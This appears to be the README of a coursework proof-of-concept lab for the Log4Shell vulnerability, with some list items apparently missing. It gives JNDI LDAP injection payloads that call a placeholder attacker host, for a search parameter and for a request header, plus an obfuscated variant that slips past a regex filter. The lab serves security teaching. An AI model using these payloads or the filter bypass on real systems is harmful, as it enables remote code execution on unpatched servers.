此仓库包含 Log4Shell 漏洞(CVE-2021-44228)的概念验证(PoC),作为 FCUP 信息安全硕士课程中 TPAS 单元课程作业的一部分开发而成。
它包含:
要运行此堆栈,你需要:
一切就绪后:
将此 payload 放入搜索栏中(由于将作为 GET 查询参数传递,需进行 URL 编码):
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D
或者将此 payload 放入请求的头部(可使用 burp suite 拦截请求并进行篡改):
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
}
在网站上,用户名称旁边有一个图标,用于切换是否使用正则表达式 \\$\\{jndi:.*?} 对记录的字符串进行清理。默认情况下,清理功能是禁用的,显示为红色恶魔图标。启用清理时,图标会变为绿色笑脸。
此功能可用于模拟 WAF 绕过,你可以在后端的 LoggerManager.java 类中添加更多正则表达式。
以下是一个不会被当前正则表达式匹配到的 payload:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}